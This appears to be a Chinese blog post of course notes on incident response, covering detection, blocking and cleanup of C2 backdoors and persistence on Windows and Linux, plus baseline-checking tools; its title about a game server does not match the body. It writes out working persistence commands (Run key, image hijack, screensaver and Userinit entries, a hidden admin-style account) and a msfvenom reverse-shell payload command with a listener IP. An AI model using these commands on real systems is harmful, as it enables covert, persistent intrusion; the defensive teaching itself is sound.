0
点赞
收藏
分享

微信扫一扫

Linux下快速搭建七日杀官方私人服务器教程

知识点

1、应急响应-C2后门-排查&封锁
2、应急响应-权限维持-排查&清理
3、应急响应-基线检测-整改&排查

演示案例-蓝队技能-C2后门&权限维持-基线检查&查杀封锁-Windows

1、常规C2后门-分析检测

无隐匿手法

在这里插入图片描述
也可以把怀疑的exe程序上传到沙箱上分析
在这里插入图片描述

有隐匿手法

CDN,云函数,中转等(涉及溯源和反制)

处置手段

清除:删除文件

封锁:防火墙都有出入站规则,需要自己判断在哪里设置封锁策略
1、防火墙阻止程序
(一般没啥用,变个文件名就不行了)
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
2、防火墙阻止网络链接-IP
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、权限维持技术-分析检测

自启动测试

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe" //把shell.exe放入启动项并命名为backdoor

在这里插入图片描述
在这里插入图片描述

隐藏账户

net user xiaodi$ xiaodi!@#X123 /add

在这里插入图片描述
可以使用PCHunter工具查看当前系统用户
在这里插入图片描述
或者

运行-lusrmgr.msc-本地用户和组-用户

在这里插入图片描述

映像劫持

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c c:/shell.exe"

在这里插入图片描述
可以使用PCHunter或者火绒剑工具查看
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

屏保&登录

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f //进入锁屏后会触发shell.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe" //有人登录这台计算机的时候就会触发shell.exe

在这里插入图片描述
在这里插入图片描述

3、Rookit后门-分析检测

后续讲到

4、Web的内存马-分析检测

后续讲到

5、基线检测配合分析项目

Golin

WindowsBaselineAssistant

在这里插入图片描述

d-eyes

在这里插入图片描述
在这里插入图片描述

FindAll

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

演示案例-蓝队技能-C2后门&权限维持-基线检查&查杀封锁-Linux

1、常规C2后门-分析检测

无隐匿手法

常规后门:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf
netstat -anpt

在这里插入图片描述

有隐匿手法

CDN,云函数,中转等(涉及溯源和反制)

处置手段

删除文件,防火墙阻止程序或IP域名等

2、权限维持技术-分析检测

GScan

Golin

d-eyes

在这里插入图片描述

Whoamifuck

Ashro_linux

linuxcheckshoot

3、Rookit后门-分析检测

后续讲到

4、Web的内存马-分析检测

后续讲到

举报

相关推荐

0 条评论